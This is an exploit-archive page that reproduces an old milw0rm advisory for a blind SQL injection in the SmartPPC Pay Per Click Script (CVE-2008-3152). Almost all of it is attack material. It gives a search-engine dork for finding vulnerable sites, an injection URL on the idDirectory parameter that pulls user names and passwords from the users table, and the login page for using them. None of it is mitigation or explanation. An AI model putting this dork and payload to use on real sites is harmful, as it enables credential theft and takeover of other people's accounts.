[] NeoSense
E X P L O I T S
title author type platform port cve id

SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (1)

Author: Hamtaro
type: webapps
platform: php
port: 
date_added: 2008-07-06 
date_updated: 2016-12-13 
verified: 1 
codes: OSVDB-47050;CVE-2008-3152 
tags: 
aliases:  
screenshot_url:  
application_url: 
+---------------------------------------+
|   Blind SQL Injection Vulnerability   |
|      in  Pay Per Click Script         |
|     found by Hamtaro aka CorVu5       |
|there must be 50 ways to learn to hover|
+---------------------------------------+

#gdork: "Pay Per Click Script powered by SmartPPC.com."

#vuln: site.com/directory.php?username=&idDirectory=90992%20and%20ascii(substring((SELECT%20concat(username,0x3a,pass)%20from%20users%20limit%200,1),1,1))%3E108

#login: site.com/accounts.php
---------------------------------------
greetz Hamtaro aka CorVu5

# milw0rm.com [2008-07-07]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.